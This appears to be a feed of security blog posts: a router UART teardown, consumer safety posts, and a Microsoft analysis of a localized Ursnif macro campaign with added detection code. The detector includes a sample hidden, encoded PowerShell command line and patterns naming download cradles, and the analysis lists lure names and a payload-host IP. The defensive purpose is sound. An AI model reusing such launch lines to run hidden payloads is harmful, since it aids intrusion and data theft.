Not being one to assume anything, we also researched what the color coding was for the cable, as it came in a little bubble wrap with no instructions and sadly nothing in the packaging to indicate whether it was of the 3.3 Volts or 5 Volts variety. Similar USB to UART cables had documentation on the web. We made an assumption and theorized that the cable coloring would be the same as the Google picture results (fingers crossed).

Roadblocks

Colors matched: black for ground, red for power, green for receive, white for transmit. So far, so good. We plugged the UART-to-USB cable into our test machine and encountered another roadblock.

While it was properly detected and Windows did install the correct drivers, it didn’t work. Some investigation revealed the device could not start.

We tried moving the USB device to a different COM port in the device manager with no success. We tried downloading the driver directly from the Prolific website and again weren’t met with success. We also tried moving the USB device to a different port (from USB 3 to regular USB). Again, no go.

Digging a little further into the properties of the device revealed that the device cannot start.

Researching this error led us to a forum post, and more specifically to this entry:

“Windows 8/8.1/10 are NOT supported in PL-2303HXA and PL-2303X EOL (End Of Life) chip versions.”

So while this USB dongle presumably works, it won’t work in Windows 10. What a surprise! Not to be easily defeated, we rebooted into Ubuntu Linux with the USB dongle still attached.

We then proceeded to check if the USB to serial adapter was working. This is achieved by issuing this command:

$ dmesg | grep tty

So now we know that the USB adapter is ttyUSB0. The Windows forum mentioned the pl2303 chipset in the adapter wasn’t supported, and we see it here. In Windows, we would’ve used the Putty terminal program. In Linux, we elected to use GtkTerm. It was installed with this command:

$ sudo apt-get install gtkterm

We found that for best results, invoking GtkTerm from bash needed sudo. (We suspect it needed the user account to be part of a group that has permissions to access the ports.)

$ sudo gtkterm

Once gtkterm was running, we needed to select the proper port. We selected the configuration option and opened the port option.

In the port drop-down menu, at the very bottom, we saw /dev/ttyUSB0. This is the Prolific USB adapter.

We left parity bit, stop bit, and flow control to the defaults and hoped for the best.

After this came the tedious task of determining which of the two center pins were transmit and receive, as well as the correct baud rate. Our first attempt was GND, RX and TX connected, with VCC left unconnected (VCC = 3.3 V = poof! Bad!).

These were the results we got. Either TX and RX are inverted, or we have selected the wrong baud rates. There is some kind of communication taking place, but the contents are all garbled. We went through the most common baud rates, but were not met with any success.

We then flipped the TX and RX and started the process of unplugging and re-plugging the transformer portion of the router, while incrementing the available baud rates in GtkTerm. When selecting the 57600 baud rate, we were met with success!
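The two manual steps above (finding the adapter in dmesg, then power-cycling the board while stepping through baud rates until the output stops being garbage) can be automated. The script below is an added example, not code from the original post; the dmesg excerpt, the U-Boot banner text and the garbage bytes are constructed stand-ins, and the hardware-backed reader assumes pyserial is installed.

```python
import re
from typing import Callable, Iterable, Optional, Tuple

# Constructed dmesg excerpt modelled on what a PL2303 adapter logs on Linux;
# it is not output captured from the post's router or adapter.
SAMPLE_DMESG = """\
[  512.101] usb 1-2: new full-speed USB device number 4 using xhci_hcd
[  512.240] usbcore: registered new interface driver pl2303
[  512.241] usbserial: USB Serial support registered for pl2303
[  512.242] pl2303 1-2:1.0: pl2303 converter detected
[  512.244] usb 1-2: pl2303 converter now attached to ttyUSB0
"""

ATTACHED_RE = re.compile(r"(\w+) converter now attached to (tty\w+)")


def find_usb_serial(dmesg_text: str) -> Optional[Tuple[str, str]]:
    """Return (driver, device path) of the last USB-serial adapter dmesg reports.
    This is the scripted form of the manual '$ dmesg | grep tty' step."""
    found = None
    for line in dmesg_text.splitlines():
        m = ATTACHED_RE.search(line)
        if m:
            found = (m.group(1), "/dev/" + m.group(2))
    return found


# Baud rates worth trying on a router console, most common first.
COMMON_BAUDS: Tuple[int, ...] = (9600, 19200, 38400, 57600, 115200)


def printable_ratio(data: bytes) -> float:
    """Fraction of bytes that are printable ASCII or ordinary whitespace."""
    if not data:
        return 0.0
    ok = sum(1 for b in data if 32 <= b < 127 or b in (9, 10, 13))
    return ok / len(data)


def probe_baud(read_sample: Callable[[int], bytes],
               bauds: Iterable[int] = COMMON_BAUDS,
               threshold: float = 0.95) -> Optional[int]:
    """Try each baud rate in turn; the first one whose boot output is almost
    entirely printable text is the console's real rate. At a wrong rate the
    UART mis-frames every byte, so the sample scores near zero.
    read_sample(baud) must return the bytes read after power-cycling the
    board with the port open at that rate."""
    for baud in bauds:
        if printable_ratio(read_sample(baud)) >= threshold:
            return baud
    return None


def pyserial_reader(port: str, nbytes: int = 512,
                    timeout: float = 3.0) -> Callable[[int], bytes]:
    """Build a read_sample() backed by pyserial (assumed installed:
    pip install pyserial). Wire GND, TX and RX only; leave the 3.3 V pin
    unconnected, exactly as the post warns."""
    import serial  # imported lazily so the offline demo below needs no hardware

    def read_sample(baud: int) -> bytes:
        with serial.Serial(port, baudrate=baud, timeout=timeout) as s:
            input(f"Power-cycle the router at {baud} baud, then press Enter...")
            return s.read(nbytes)

    return read_sample


# Constructed stand-in for the board: framing garbage at the wrong rates and a
# U-Boot-style banner at 57600, the rate the post eventually found.
FAKE_BANNER = (b"\r\nU-Boot 1.1.3\r\n\r\nPlease choose the operation:\r\n"
               b"   4: boot command line interface.\r\n")
FAKE_GARBAGE = bytes([0xFF, 0xFE, 0x00, 0x86, 0x1C, 0xF8, 0x7F, 0xE0] * 8)


def fake_read_sample(baud: int) -> bytes:
    """Offline substitute for pyserial_reader(): only 57600 yields clean text."""
    return FAKE_BANNER if baud == 57600 else FAKE_GARBAGE


if __name__ == "__main__":
    print(find_usb_serial(SAMPLE_DMESG))  # ('pl2303', '/dev/ttyUSB0')
    print(probe_baud(fake_read_sample))   # 57600
```

If the ratio never clears the threshold at any rate, swap TX and RX and sweep again, which is the other half of the manual procedure.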

We could now see how this portable router starts up. It uses u-boot (1.1.3). As the system is starting, there is a brief moment where you are offered options:

If you enter “4” at just the right moment, it interrupts the boot process and dumps you at a prompt. This is probably the menu used at the factory to apply the correct firmware and perform quality assurance checks and confirm that the unit isn’t defective. Some of the options look like they could be destructive and brick the device, so we were careful in our selection.

Entering “help” gives you a list of the commands available at the u-boot command line.

Printenv gives even further information. We could re-flash this unit. We could reset the unit. All of this is good, but doesn’t really help us ascertain the security posture of the device.

We kept navigating the menus looking for interesting things to do, but the U-Boot environment was pretty limited. We also discovered that if you let the boot process take place normally and press any key once it is done, you are dumped at a command prompt as well.

Navigating the available directories revealed three entries: cfg, net, and os. These are files, not subdirectories, and they have no extension. When invoked individually with no switches, each prints a usage description.

What we learned so far

So what have we learned about the security of this device? Someone with local access could probably modify its behavior quite easily.

The documentation on the chipset mentions that the “[REDACTED] embedded with 8MB memory and provide eCos turnkey for compact router…”

We have a sneaky suspicion that this is the underlying operating system. We know that the U-Boot for MIPS boot loader turns control over to “something” once it’s done initializing the hardware. Turnkey sounds easy, and easy is usually what manufacturers go for.

The wiki for eCos has interesting entries under the “Criticism” heading:

The FreeBSD TCP/IP network stack included with eCos is out of date (circa 2001) and exposes systems to numerous security and stability vulnerabilities (FreeBSD RELENG_4_4_0_RELEASE for IPv4 and FreeBSD’s origin KAME for IPv6). Official eCos maintainers do not appear to monitor FreeBSD or KAME for security or stability updates, but rather rely on minimal and insufficient bug reports from users of eCos.[citation needed]

The SNMP package is rudimentary at best, once again, apparently due to its age.[original research?]

Retrospection

Let’s look at what it has taken so far to gather this information. Some specialized tools, some specialized hardware, some non-trivial computer knowledge, and a certain amount of pig-headedness. And after all this, we haven’t even found anything remotely close to a glaring vulnerability. We know more about our device, and that’s a good thing. However, there’s no way that an average user will go through this. It’s a cool exercise. But it isn’t realistic to expect average users to reverse their devices.

What next?

We want to confirm what the OS is 100 percent and not just rely on a “hunch.” Remember the firmware update we collected from the [REDACTED] website? We’ll try to extract information from the .img file. We are hoping that the update will contain information that is useful. We’re also interested in dumping the local firmware off of the router as well. We’re doing this so we can compare the original firmware with the modified, updated one, as well as to see what was corrected or changed and maybe figure out what was the issue that this update addressed.

Maybe they implemented a fix that only partially fixes the issue? Maybe they fixed the problem and not the underlying vulnerability? All of these questions are worthy of an answer.

Do you see something I’ve done wrong? Have suggestions on other things to try? Reach out to @jean_taggart on the Twitters. I’m keenly interested to hear from all of you.

The post Assessing the security of a portable router: a look inside its hardware appeared first on Malwarebytes Labs.

New Pokémon Go settings highlight importance of parental controls

Pokémon Go has been a massive success story for smartphone gaming. Simple to play, and with an emphasis on taking more exercise, the game is popular with adults and children alike.

In the past, anyone could create an account to play Pokémon Go using their Google or Facebook login details. But for many parents, this sign-up process was concerning.

All or nothing

By providing a Google or Facebook account to Pokémon Go, the developers of the game, Niantic, also gain access to those social accounts. Without any way to limit access, Niantic can “see” everything on that account and share it with their business partners.

Clearly this is undesirable – and unnecessary – for a kid’s game. But until now there has not been any way to control data sharing.

To address these concerns, Niantic has created the ‘Niantic Kids’ platform. Built with the assistance of ESRB Privacy Certified experts Super Awesome, Niantic Kids promises to help parents better protect their kids without ruining the game.

Niantic Kids is fully compliant with a range of international privacy laws, including GDPR in Europe and the Children’s Online Privacy Protection Act in the USA. By signing up for a Niantic Kids account, parents will be able to limit the amount of information shared with Pokémon Go – and better protect the privacy of their kids.

A lesson in smartphone safety

The reality is that Pokémon Go isn’t the only app harvesting potentially sensitive data from your child’s smartphone. Many “free” apps and games generate income by sharing the information they collect from your phone with advertisers, data aggregators and other partners.

The default settings on most apps will be to enable sharing – parental controls are almost never enabled as standard (even the parental controls in Panda Dome must be manually enabled). It is absolutely essential that you check each app installed on your child’s phone and use the parental controls to limit access to their information.

It is not just apps you need to check either. Apple’s iOS (installed on iPhones and iPads) has a number of additional privacy settings to give parents greater control over devices. Android devices have similar controls which need to be applied on your child’s phone.

Child safety applies to all devices

To properly protect your children you should enable parental controls on all of their devices. So if they have access to a laptop or desktop computer, you need to look at ways to protect their privacy, and to restrict access to adult or illegal content.

Again, Mac OS (installed on iMacs and MacBooks) and Windows come with basic parental controls as standard. But these tools tend to be quite limited in what they can do. Instead we recommend installing Panda Dome (free trial available here).

Panda Dome makes it easy to block unwanted websites and to see how the computer is being used. These reports provide clues about your child’s online behaviour, and offer a useful opportunity to discuss how to use the Internet safely.

Parental controls are not about stopping your kids from having fun online. They are designed to help your kids have fun online safely.

You can read more about keeping kids safe online in our Parental Controls media centre.

The post New Pokémon Go settings highlight importance of parental controls appeared first on Panda Security Mediacenter.

Cyber Security Tricks and Treats

When it comes to cybersecurity, there are very few treats to be enjoyed.

With internet usage at an all-time high, users are especially vulnerable to cyber attacks and hacks. These tricks can include phishing attacks, session hijacking and ransomware. And since it’s National Cyber Security Awareness Month, it’s the perfect time to brush up on cyber security knowledge, and find out how you can make a treat out of a trick this Halloween season.

This Halloween, keep your devices and personal information safe from hackers’ tricks. If something looks wrong or feels too good to be true, it probably is. Ensure all devices have the most current updates, install an antivirus and use a VPN when necessary.

Get started today.

Download Panda Free Antivirus, and defeat the evil gremlins who could turn your Halloween into a nightmare.

The post Cyber Security Tricks and Treats appeared first on Panda Security Mediacenter.

5 InfoSec Trends To Watch For

The infosec industry is booming, so it’s no surprise that new challenges and cyber threats will face IT departments for the years to come. With that in mind, what are the InfoSec trends we should all watch out for?

According to the Ponemon Institute, the global average cost of a data breach is down 10% over previous years to $3.62 million. However, this does not mean you should let your guards down. Here are some of the InfoSec trends you should watch out for:

Ransomware keeps growing

With 34% of people globally willing to pay a ransom to get their data back, and an increasing 64% for Americans, cybercriminals are more than ever motivated to raise their stakes… in terms of victims, and ransom demands.

Higher demand for skilled professionals 

InfoSec jobs require specialized skills and extensive practical training. More sophisticated threats and techniques are discovered every day and require professionals to stay up-to-date. To address this issue, and stay up-to-date on the latest skills and techniques, we recommend lots of reading, constant studying and practicing (every 3-6 months).

Trusting one or a team of individuals to protect and defend their digital assets has become an issue for companies (see next point). For this reason, we’ll see more and more temporary-hired professionals such as bug bounty hunters, consultants, free-lancers, etc.

Data breaches are on the rise

According to The Economist, oil no longer is the World’s most valuable resource, data is. Data is growing faster than ever before, and by the year 2020, about 1.7 megabytes of new information will be created every second for every human being. In the quest for more power, cybercriminals are making data their favorite past-time.

In addition, a global survey from Symantec suggests that 50% of employees keep confidential corporate data after leaving or losing their jobs, putting insider threats at the same level of risk. Finding the right people to protect and defend their assets remains a key goal for corporations in 2018.

Attackers get smarter

With new technologies, software, and techniques developed each day – and with sanctions getting harder – attackers have no option but to get smarter themselves… or to put their skills to use defending organizations instead. To catch a hacker, you must first think like one.

Cyber risk insurance becomes more common

As the InfoSec industry evolves, we might see more of cyber insurance coverage for loss of trust with their customers, loss of future revenue from negative media, and improvement costs for security infrastructure or system upgrades.


Sources: CSO, Information Age, CMS Wire, Forbes


British Airways Website and App Compromised

The customer data of more than 380,000 people has been compromised. British Airways (BA), the largest airline in the United Kingdom, operating flights to almost every major city in the US, has been attacked by hackers.

Cybercriminals have stolen the personal and financial details of hundreds of thousands of BA customers. The data includes credit card details and other banking information, as well as names, addresses, and phone numbers of people who used the website and the app between 22:58 BST August 21st, 2018 and 21:45 BST September 5th, 2018. According to British Airways, the stolen data does not include passport details. It is currently not known whether the hackers were also able to access cards saved on the website.

The data breach was announced earlier this week on the company’s blog. According to the statement released by BA, the breach is now resolved, and both the website and the app are safe to use. The airline carrier has hired a team of experts who currently are investigating the cause of the breach. BA has notified the police and all relevant authorities about the incident. It is still unknown who is behind the attack and if the stolen data has already been used for fraudulent transactions.

Alex Cruz, British Airways’ Chairman and Chief Executive Officer, said: “We are deeply sorry for the disruption that this criminal activity has caused. We take the protection of our customers’ data very seriously.”

The UK airline has already started approaching the potential victims, advising them to keep an eye on their bank accounts and report any unusual account activity to their bank. If you’ve purchased anything from British Airways over the last few weeks, your identity and finances might be at risk.

British Airways angered its customers by tweeting about the leak instead of approaching the victims directly. Even though BA bills itself as the world’s favorite airline, this is a clear example that even companies that strive to take data protection very seriously sometimes fall victim to hackers and experience technical issues.

It is your responsibility to change passwords at least once every three months, monitor your bank statements, and have antivirus software installed on all your connected devices – hackers know that people will be expecting emails from BA and will start sending phishing emails.

Keep your eyes wide open and don’t fall victim!


The post British Airways Website and App Compromised appeared first on Panda Security Mediacenter.

Small businesses targeted by highly localized Ursnif campaign

Cyber thieves are continuously looking for new ways to get people to click on a bad link, open a malicious file, or install a poisoned update in order to steal valuable data. In the past, they cast as wide a net as possible to increase the pool of potential victims. But attacks that create a lot of noise are often easier to spot and stop. Cyber thieves are catching on that we are watching them, so they are trying something different. Now we’re seeing a growing trend of small-scale, localized attacks that use specially crafted social engineering to stay under the radar and compromise more victims.

In social engineering attacks, is less really more?

A new malware campaign puts that to the test by targeting home users and small businesses in specific US cities. This was a focused, highly localized attack that aimed to steal sensitive info from just under 200 targets. Macro-laced documents masqueraded as statements from legitimate businesses. The documents are then distributed via email to target victims in cities where the businesses are located.

With Windows Defender AV's next-gen defense, however, the size of the attack doesn't really matter.

Several cloud-based machine learning algorithms detected and blocked the malicious documents at the onset, stopping the attack and protecting customers from what would have been the payload, info-stealing malware Ursnif.

The map below shows the location of the targets.

Figure 1. Geographic distribution of target victims

Highly localized social engineering attack

Here's how the attack played out: Malicious, macro-enabled documents were delivered as email attachments to target small businesses and users. Each document had a file name that spoofed a legitimate business name and masqueraded as a statement from that business. In total, we saw 21 unique document file names used in this campaign.

The attackers sent these emails to intended victims in the city or general geographic area where the businesses are located. For example, the attachment named Dolan_Care_Statement.doc was sent almost exclusively to targets in Missouri. The document file name spoofs a known establishment in St. Louis. While we do not believe the establishment itself was affected or targeted by this attack, the document purports to be from the said establishment when it's really not.

The intended effect is for recipients to receive documents that appear to come from local, familiar businesses or service providers. It's part of the social engineering scheme to increase the likelihood that recipients will think the document is legitimate and take the bait, when in reality it is a malicious document.

Most common lure document file names and their top target cities:

Dockery_FloorCovering_Statement: Johnson City, TN; Kingsport, TN; Knoxville, TN
Dolan_Care_Statement: St. Louis, MO; Chesterfield, MO; Lees Summit, MO
DMS_Statement: Omaha, NE; Wynot, NE; Norwalk, OH
Dmo_Statement: New Braunfels, TX; Seguin, TX; San Antonio, TX
DJACC_Statement: Miami, FL; Flagler Beach, FL; Niles, MI
Donovan_Construction_Statement: Alexandria, VA; Mclean, VA; Manassas, VA

Table 1. Top target cities of most common document file names

When recipients open the document, they are shown a message that tricks the person into enabling the macro.

Figure 2. Document tricks victim into enabling the macro

As is typical in social engineering attacks, this is not true. If the recipient does enable the macro, no content is shown. Instead, the following process is launched to deobfuscate a PowerShell command.

Figure 3. Process to deobfuscate PowerShell

Figure 4. PowerShell command

The PowerShell script connects to any of 12 different URLs that all deliver the payload.

Figure 5. Deobfuscated PowerShell command

The payload is Ursnif, info-stealing malware. When run, Ursnif steals information about infected devices, as well as sensitive information like passwords. Notably, this infection sequence (i.e., cmd.exe process deobfuscates a PowerShell that in turn downloads the payload) is a common method used by other info-stealing malware like Emotet and Trickbot.
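The cmd.exe-to-PowerShell sequence above is what an endpoint detection rule keys on. The following is an added example, not Microsoft's detection logic, that replays constructed Sysmon-style process-creation events, flags any PowerShell process descended from an Office application, decodes a -EncodedCommand argument if present, and notes the lure file name; the event fields and the sample command lines are assumptions.

```python
import base64
import re
from typing import Dict, List, Optional

# Constructed Sysmon-style process-creation events (hypothetical schema, not real
# telemetry). The chain 200 -> 300 -> 400 mirrors the Word -> cmd.exe -> PowerShell
# sequence described in the text; pid 500 is benign noise.
EVENTS: List[Dict] = [
    {"pid": 100, "ppid": 1, "image": "explorer.exe", "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": "WINWORD.EXE",
     "cmd": 'WINWORD.EXE /n "C:\\Users\\u\\Downloads\\Dolan_Care_Statement.doc"'},
    {"pid": 300, "ppid": 200, "image": "cmd.exe",
     "cmd": "cmd.exe /c set p=powershell& call %p% -w hidden -enc SQBFAFgA"},
    {"pid": 400, "ppid": 300, "image": "powershell.exe",
     "cmd": "powershell.exe -w hidden -enc SQBFAFgA"},
    {"pid": 500, "ppid": 100, "image": "cmd.exe", "cmd": "cmd.exe /c dir"},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Lure documents in this campaign were named <Business>_Statement.doc.
LURE_RE = re.compile(r"([\w-]+_statement\.doc)\b", re.IGNORECASE)
# -e / -ec / -enc / -encodedcommand followed by the base64 blob.
ENC_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
INDICATORS = {
    "hidden-window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE),
    "encoded-command": ENC_RE,
    "download-cradle": re.compile(
        r"downloadstring|downloadfile|net\.webclient|invoke-webrequest", re.IGNORECASE),
    "invoke-expression": re.compile(r"\biex\b|invoke-expression", re.IGNORECASE),
}


def decode_encoded_command(cmd: str) -> Optional[str]:
    """Return the plaintext of a -EncodedCommand argument (base64 of UTF-16LE)."""
    m = ENC_RE.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def powershell_indicators(cmd: str) -> List[str]:
    """Names of suspicious traits found in the command line or its decoded payload."""
    decoded = decode_encoded_command(cmd)
    text = cmd if decoded is None else f"{cmd} {decoded}"
    return [name for name, rx in INDICATORS.items() if rx.search(text)]


def ancestry(events: List[Dict], pid: int, max_depth: int = 4) -> List[Dict]:
    """Process and its ancestors, child first, up to max_depth entries."""
    by_pid = {e["pid"]: e for e in events}
    chain = []
    cur = by_pid.get(pid)
    while cur is not None and len(chain) < max_depth:
        chain.append(cur)
        cur = by_pid.get(cur["ppid"])
    return chain


def find_office_spawned_powershell(events: List[Dict]) -> List[Dict]:
    """Flag every PowerShell process that has an Office application among its ancestors."""
    findings = []
    for e in events:
        if e["image"].lower() != "powershell.exe":
            continue
        chain = ancestry(events, e["pid"])
        office = next((a for a in chain if a["image"].lower() in OFFICE_APPS), None)
        if office is None:
            continue
        lure = LURE_RE.search(office["cmd"])
        findings.append({
            # Oldest ancestor first, e.g. WINWORD.EXE -> cmd.exe -> powershell.exe
            "chain": [a["image"] for a in reversed(chain[: chain.index(office) + 1])],
            "lure_document": lure.group(1) if lure else None,
            "indicators": powershell_indicators(e["cmd"]),
        })
    return findings


if __name__ == "__main__":
    for f in find_office_spawned_powershell(EVENTS):
        print(" -> ".join(f["chain"]), f["lure_document"], f["indicators"])
```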

How machine learning stopped this small-scale, localized attack

As the malware campaign got under way, four different cloud-based machine learning models gave the verdict that the documents were malicious. These four models are among a diverse set of models that help ensure we catch a wide range of new and emerging threats. Different models have different areas of expertise; they use different algorithms and are trained on their unique set of features.

One of the models that gave the malicious verdict is a generic model designed to detect non-portable executable (PE) threats. We have found that models like this are effective in catching social engineering attacks, which typically use non-PE files like scripts and, as is the case for this campaign, macro-laced documents.

The said non-PE model is a simple averaged perceptron algorithm that uses various features, including expert features, fuzzy hashes of various file sections, and contextual data. The simplicity of the model makes it fast, enabling it to give split-second verdicts before suspicious files could execute. Our analysis into this specific model showed that the expert features and fuzzy hashes had the biggest impact in the model's verdict and the eventual blocking of the attack.

Figure 6. Impact of features used by one ML model that detected the attack
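As an added illustration of the model family named above, and not Microsoft's classifier, feature set or training data, the following trains an averaged perceptron on constructed sparse document features (hypothetical expert features such as AutoOpen and Shell calls, plus coarse fuzzy-hash buckets) and reports each feature's contribution to a verdict, the kind of per-feature impact breakdown Figure 6 summarises.

```python
from collections import defaultdict
from typing import Dict, List, Tuple

# Constructed training set (made-up values): sparse binary features per document
# and a label (+1 malicious, -1 benign). "macro:*" stand in for expert features,
# "fuzzy:bucket_N" for coarse fuzzy-hash buckets, "name:*" for file-name context.
TRAIN: List[Tuple[Dict[str, int], int]] = [
    ({"macro:autoopen": 1, "macro:shell": 1, "macro:wscript": 1,
      "fuzzy:bucket_7": 1, "name:_statement": 1}, +1),
    ({"macro:autoopen": 1, "macro:shell": 1, "fuzzy:bucket_7": 1, "name:_statement": 1}, +1),
    ({"macro:autoopen": 1, "macro:shell": 1, "macro:strreverse": 1, "fuzzy:bucket_7": 1}, +1),
    ({"macro:autoopen": 1, "macro:shell": 1, "fuzzy:bucket_12": 1, "name:_statement": 1}, +1),
    ({"macro:autoopen": 1, "fuzzy:bucket_3": 1, "name:_invoice": 1}, -1),
    ({"fuzzy:bucket_3": 1, "name:_invoice": 1}, -1),
    ({"macro:shell": 1, "fuzzy:bucket_5": 1}, -1),  # benign automation macro
    ({"fuzzy:bucket_5": 1, "name:_statement": 1}, -1),
]


class AveragedPerceptron:
    """Binary perceptron whose final weights are the average over all update steps.

    Averaging smooths the last few mistakes out of the weight vector, which is why
    the averaged variant generalises better than the plain perceptron."""

    def __init__(self) -> None:
        self.w = defaultdict(float)        # current weights
        self._totals = defaultdict(float)  # sum of weight values over steps (lazy)
        self._stamps = defaultdict(int)    # step at which each weight last changed
        self._step = 0
        self.avg: Dict[str, float] = {}

    def score(self, feats: Dict[str, int], weights=None) -> float:
        weights = self.w if weights is None else weights
        return sum(weights.get(f, 0.0) * v for f, v in feats.items())

    def _update(self, feats: Dict[str, int], y: int) -> None:
        for f, v in feats.items():
            # credit the old value for every step it was in force before changing it
            self._totals[f] += (self._step - self._stamps[f]) * self.w[f]
            self._stamps[f] = self._step
            self.w[f] += y * v

    def fit(self, data, epochs: int = 5) -> "AveragedPerceptron":
        for _ in range(epochs):
            for feats, y in data:
                self._step += 1
                if y * self.score(feats) <= 0:  # mistake or on the boundary
                    self._update(feats, y)
        for f in list(self.w):  # flush the lazy totals and average
            self._totals[f] += (self._step - self._stamps[f]) * self.w[f]
            self.avg[f] = self._totals[f] / self._step
        return self

    def predict(self, feats: Dict[str, int]) -> int:
        return 1 if self.score(feats, self.avg) > 0 else -1

    def explain(self, feats: Dict[str, int]) -> List[Tuple[str, float]]:
        """Per-feature contribution (weight * value) to the verdict, largest first."""
        contrib = {f: self.avg.get(f, 0.0) * v for f, v in feats.items()}
        return sorted(contrib.items(), key=lambda kv: -abs(kv[1]))


if __name__ == "__main__":
    model = AveragedPerceptron().fit(TRAIN)
    doc = {"macro:autoopen": 1, "macro:shell": 1, "fuzzy:bucket_7": 1, "name:_statement": 1}
    print(model.predict(doc), model.explain(doc))
```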

Next-generation protection against malware campaigns regardless of size

Machine learning and artificial intelligence power Windows Defender Antivirus to detect and stop new and emerging attacks before they can wreak havoc. Every day, we protect customers from millions of distinct, first-seen malware. Our layered approach to intelligent, cloud-based protection employs a diverse set of machine learning models designed to catch the wide range of threats: from massive malware campaigns to small-scale, localized attacks.

The latter is a growing trend, and we continue to watch the threat landscape to keep machine learning effective against attacks. In a recent blog post, we discussed how we continue to harden machine learning defenses.

Windows Defender AV delivers the next-gen protection capabilities in the Windows Defender Advanced Threat Protection (Windows Defender ATP). Windows Defender ATP integrates attack surface reduction, next-gen protection, endpoint detection and response (EDR), automatic investigation and response, security posture, and advanced hunting capabilities.

Because of this integration, antivirus detections, such as those related to this campaign, are surfaced in Windows Defender Security Center. Using EDR capabilities, security operations teams can then investigate and respond to the incident. Attack surface reduction rules also block this campaign, and these detections are likewise surfaced in Windows Defender ATP. To test how Windows Defender ATP can help your organization detect, investigate, and respond to advanced attacks, sign up for a free trial.

Across the whole Microsoft 365 threat protection, detections and other security signals are shared among Office 365 ATP, Windows Defender ATP, and Azure ATP. In this Ursnif campaign, the antivirus detection also enables the blocking of related emails in Office 365. This demonstrates how signal sharing and orchestration of remediation across solutions in Microsoft 365 results in better integrated threat protection.

Bhavna Soman
Windows Defender Research

Indicators of compromise (IOCs)

Infector:

File names
CSC_Statement.doc
DBC_Statement.doc
DDG_Statement.doc
DJACC_Statement.doc
DKDS_Statement.doc
DMII_Statement.doc
dmo_statement.doc
DMS_Statement.doc
Dockery_Floorcovering_Statement.doc
Docktail_Bar_Statement.doc
doe_statement.doc
Dolan_Care_Statement.doc
Donovan_Construction_Statement.doc
Donovan_Engineering_Statement.doc
DSD_Statement.doc
dsh_statement.doc
realty_group_statement.doc
statement.doc
tri-lakes_motors_statement.doc
TSC_Statement.doc
UCP_Statement.doc

Payload (Ursnif)

Note: The first four payload domains are all registered in Russia and are hosted on the IP address 185[.]212[.]44[.]114. The other domains follow the same URL pattern and are also pushing Ursnif, but no registration info is available.

Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence.

Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence.

The post Small businesses targeted by highly localized Ursnif campaign appeared first on Microsoft Secure.

Five school cybersecurity questions you should ask on your next parent-teacher conference

The summer is officially over, and children are back to school! Whether you are at work or left home alone, you are probably feeling a mixture of relief and sadness. Even though you always keep them in mind, your precious bundles of joy are now away from you for most of the day.

Children spend more time in front of the little screens than ever. We are sure that you’ve given them plenty of pieces of advice on how to stay safe in both the real world and the online one. You most likely already have full control over their digital life and have installed parental control software on their connected devices. However, sometimes the children are not the only ones who need some cybersecurity education, the school employees may need some guidance too. Even if you are one of the lucky parents who send their children to schools that ban the use of smartphones on learning grounds, there are a few questions concerning the safety of your children that you should raise next time you speak with the school administration.

What information do schools keep on your children and who has access to it?

The school system stores a lot of information about your children. It often includes standard directory information such as names, addresses, and phone numbers as well as more sensitive data such as SSN and DOB. All information is generally protected by the federal Family Educational Rights and Privacy Act (FERPA). However, many educational institutions sometimes grant access to such information to school employees who do not need it but can take advantage of it. It’s always worth asking the question!

What happens if the school becomes a target of a ransomware attack?

Educational institutions are targets of hacker attacks all the time. Sometimes the attackers request a ransom. Asking what the procedure would be if your children's personal details get stolen is a must. Asking what the school does to prevent such attacks is also a good question. Educational entities are often underfunded and do not have the resources to take good care of their students' cybersecurity needs. Knowing more about such procedures must be on your checklist every time you choose a school.

How often do children and school employees change passwords?

Following the right procedures for password maintenance is a must for educational entities that store such sensitive information, and it must be implemented for both students and employees. The last thing you want is for hackers to steal the identity of innocent children and ruin their lives before they even have a chance to defend themselves. SSNs generally never change, so the information taken now might be used 5-10 years from now when the children become adults. Best practices say that passwords should never be reused and they must be changed every three months.

What data is kept after students and employees leave the school?

Educational entities are supposed to deactivate the accounts of former students and employees. However, this is not always the case as it is known that some accounts are often overlooked and left active for years. The IT departments either do it by mistake or do the students/employees a favor so they can continue taking advantage of the educational benefits – as you know some services, including Apple Music, provide discounts through educational email verification. Such unmonitored accounts could sometimes be used by hackers to get into the internal systems of educational institutions.

What steps does your school administration do to prevent school cyberbullying?

The fight against cyberbullying, access to inappropriate websites, online predators and dangerous games such as the Blue Whale Challenge starts at school – proper cybersecurity education would help both students and employees. Students will know how to not only protect themselves but also report inappropriate behavior, and pedagogues will increase their knowledge in spotting disturbing actions. These are questions that need to be discussed on a regular basis, as technology trends change all the time and staying up-to-date is not an easy task, especially in underfunded and underperforming schools.

For some of the questions, there is not a right answer, nor a wrong one. However, raising the topics is vital as it will encourage educational institutions to always be on top of their game, and will give you the peace of mind you need.


The post Five school cybersecurity questions you should ask on your next parent-teacher conference appeared first on Panda Security Mediacenter.

Practical application of artificial intelligence that can transform cybersecurity

As I write this blog post, I'm sitting by the beach on my computer in a sunny destination while my family plays in the water. We're on vacation, but we all have our own definition of fun. For me it's writing blogs on the beach, really! The headspace is outstanding for uninterrupted thinking time and focus. However, my employer may not find my vacation destination to be the safest place to access certain applications and data. They want me to strongly authenticate, and they want to understand the health of the systems and devices I am using, as well as the network and geolocation. But thanks to the power of machine learning and conditional access I am able to write this blog when and where I want. My employer is able to enforce all-encompassing security measures to ensure my device, location, and network are safe and confirm it's really me trying to sign in.

The ability for my organization to reason over all of the data, including location, device health, sign-in, and app health, is just one example of the way artificial intelligence (AI) is helping us evolve the tools we use to fight cybercrime. In this post I'll focus on two practical use cases for deploying AI in the cybercrime battlefield. In the first example, I explain how layering AI onto on-premises Security Information and Event Management (SIEM) solutions can give you better insights and predictive capabilities. The second use case is the one I just hinted at, which is how we can take AI even further to protect user access. By the end I hope I've proven to you that there is tremendous opportunity to use AI, particularly machine learning, to improve the efficacy of cybersecurity, the detection of hackers, and even prevent attacks before they occur.

